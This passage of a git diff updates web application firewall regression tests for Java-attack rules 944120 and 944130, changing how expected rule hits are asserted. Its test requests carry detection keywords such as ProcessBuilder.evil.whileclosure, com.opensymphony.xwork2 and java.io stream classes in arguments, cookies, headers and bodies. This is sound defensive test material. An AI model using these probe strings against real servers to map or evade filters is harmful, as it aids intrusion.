"Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2730,7 +2862,8 @@ tests: {"ProcessBuilder.evil.whileclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2755,7 +2888,8 @@ tests: {"ProcessBuilder.evil.whileclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2780,7 +2914,8 @@ tests: ProcessBuilder.evil.whileclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2805,4 +2940,5 @@ tests: ProcessBuilder.evil.whileclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 39be47806..9eac2d2ed 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "com.opensymphony.xwork2=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 10 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"com.opensymphony.xwork2\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 11 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "{\"com.opensymphony.xwork2\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 12 desc: "Argument test includes keyword com.sun.org.apache" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "test=com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 13 desc: "Argument name includes keyword com.sun.org.apache" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "com.sun.org.apache=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 14 desc: "Cookie test includes keyword com.sun.org.apache" stages: @@ -273,7 +286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 15 desc: "Cookie name includes keyword com.sun.org.apache" stages: @@ -293,7 +307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 16 desc: "Request header test includes keyword com.sun.org.apache" stages: @@ -313,7 +328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 17 desc: "XML attribute value includes keyword com.sun.org.apache" stages: @@ -332,7 +348,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 18 desc: "XML element value includes keyword com.sun.org.apache" stages: @@ -351,7 +368,8 @@ tests: version: "HTTP/1.0" data: "com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 19 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: @@ -370,7 +388,8 @@ tests: version: "HTTP/1.0" data: "com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 20 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: @@ -389,7 +408,8 @@ tests: version: "HTTP/1.0" data: "test=com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 21 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: @@ -408,7 +428,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"com.sun.org.apache\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 22 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: @@ -427,7 +448,8 @@ tests: version: "HTTP/1.0" data: "{\"com.sun.org.apache\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: @@ -446,7 +468,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: @@ -465,7 +488,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: @@ -485,7 +509,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: @@ -505,7 +530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: @@ -525,7 +551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: @@ -544,7 +571,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: @@ -563,7 +591,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: @@ -582,7 +611,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: @@ -601,7 +631,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: @@ -620,7 +651,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: @@ -639,7 +671,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.BufferedInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: @@ -658,7 +691,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: @@ -677,7 +711,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: @@ -697,7 +732,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: @@ -717,7 +753,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: @@ -737,7 +774,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: @@ -756,7 +794,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: @@ -775,7 +814,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: @@ -794,7 +834,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: @@ -813,7 +854,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 43 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: @@ -832,7 +874,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: @@ -851,7 +894,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.BufferedReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: @@ -870,7 +914,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: @@ -889,7 +934,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: @@ -909,7 +955,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: @@ -929,7 +976,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: @@ -949,7 +997,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: @@ -968,7 +1017,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: @@ -987,7 +1037,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 52 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: @@ -1006,7 +1057,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: @@ -1025,7 +1077,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: @@ -1044,7 +1097,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: @@ -1063,7 +1117,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.ByteArrayInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: @@ -1082,7 +1137,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: @@ -1101,7 +1157,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: @@ -1121,7 +1178,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: @@ -1141,7 +1199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: @@ -1161,7 +1220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1180,7 +1240,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1199,7 +1260,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1218,7 +1280,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: @@ -1237,7 +1300,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1256,7 +1320,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: @@ -1275,7 +1340,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: @@ -1294,7 +1360,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: @@ -1313,7 +1380,8 @@ tests: version: "HTTP/1.0" data: "java.io.CharArrayReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: @@ -1333,7 +1401,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: @@ -1353,7 +1422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: @@ -1373,7 +1443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: @@ -1392,7 +1463,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: @@ -1411,7 +1483,8 @@ tests: version: "HTTP/1.0" data: "java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: @@ -1430,7 +1503,8 @@ tests: version: "HTTP/1.0" data: "java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: @@ -1449,7 +1523,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: @@ -1468,7 +1543,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.CharArrayReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: @@ -1487,7 +1563,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.CharArrayReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: @@ -1506,7 +1583,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: @@ -1525,7 +1603,8 @@ tests: version: "HTTP/1.0" data: "java.io.DataInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: @@ -1545,7 +1624,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: @@ -1565,7 +1645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: @@ -1585,7 +1666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: @@ -1604,7 +1686,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: @@ -1623,7 +1706,8 @@ tests: version: "HTTP/1.0" data: "java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: @@ -1642,7 +1726,8 @@ tests: version: "HTTP/1.0" data: "java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: @@ -1661,7 +1746,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: @@ -1680,7 +1766,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.DataInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: @@ -1699,7 +1786,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.DataInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: @@ -1718,7 +1806,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: @@ -1737,7 +1826,8 @@ tests: version: "HTTP/1.0" data: "java.io.File=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: @@ -1757,7 +1847,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 92 desc: "Cookie name includes keyword java.io.File" stages: @@ -1777,7 +1868,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: @@ -1797,7 +1889,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: @@ -1816,7 +1909,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: @@ -1835,7 +1929,8 @@ tests: version: "HTTP/1.0" data: "java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: @@ -1854,7 +1949,8 @@ tests: version: "HTTP/1.0" data: "java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: @@ -1873,7 +1969,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: @@ -1892,7 +1989,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.File\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: @@ -1911,7 +2009,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.File\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: @@ -1930,7 +2029,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: @@ -1949,7 +2049,8 @@ tests: version: "HTTP/1.0" data: "java.io.FileOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: @@ -1969,7 +2070,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: @@ -1989,7 +2091,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 104 desc: "Request header test includes keyword java.io.FileOutputStream" stages: @@ -2009,7 +2112,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: @@ -2028,7 +2132,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: @@ -2047,7 +2152,8 @@ tests: version: "HTTP/1.0" data: "java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: @@ -2066,7 +2172,8 @@ tests: version: "HTTP/1.0" data: "java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: @@ -2085,7 +2192,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: @@ -2104,7 +2212,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FileOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: @@ -2123,7 +2232,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FileOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: @@ -2142,7 +2252,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 112 desc: "Argument name includes keyword java.io.FilterInputStream" stages: @@ -2161,7 +2272,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: @@ -2181,7 +2293,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: @@ -2201,7 +2314,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: @@ -2221,7 +2335,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: @@ -2240,7 +2355,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: @@ -2259,7 +2375,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: @@ -2278,7 +2395,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: @@ -2297,7 +2415,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: @@ -2316,7 +2435,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: @@ -2335,7 +2455,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FilterInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: @@ -2354,7 +2475,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: @@ -2373,7 +2495,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 124 desc: 